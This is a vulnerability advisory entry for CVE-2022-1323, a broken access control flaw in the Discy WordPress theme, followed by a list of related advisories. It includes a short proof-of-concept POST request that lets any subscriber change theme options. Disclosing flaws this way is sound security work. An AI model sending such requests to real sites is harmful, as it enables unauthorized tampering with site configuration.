Discy < 5.0 – Subscriber+ Broken Access Control to change settings | CVE 2022-1323 | Theme Vulnerabilities

Description

The theme lacks authorization checks then processing ajax requests to the discy_update_options action, allowing any logged in users (with privileges as low as Subscriber,) to change the theme options by sending a crafted POST request.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Cookie: [subscriber+]

action=discy_update_options&data=<changed settings>

Affects Themes

Fixed in 5.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

2d8020e1-6489-4555-9956-2dc190aaa61b

Timeline

Publicly Published

2022-07-12 (about 1 years ago)

Added

2022-07-12 (about 1 years ago)

Last Updated

2023-07-04 (about 10 months ago)

Other

Published

Title

Published

2024-04-22

Title

BP Better Messages < 2.4.33 - Missing Authorization

Published

2023-04-05

Title

WCFM Marketplace < 3.4.12 - Subscriber+ Unauthorised AJAX Calls

Published

2023-12-27

Title

WebinarIgnition < 3.05.1 - Missing Authorization to Unauthenticated Privilege Escalation

Published

2024-01-30

Title

Fatal Error Notify < 1.5.3 - Subscriber+ Test Error Email Sending

Published

2024-04-22

Title

Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy < 2.1.2 - Unauthenticated Arbitrary Content Deletion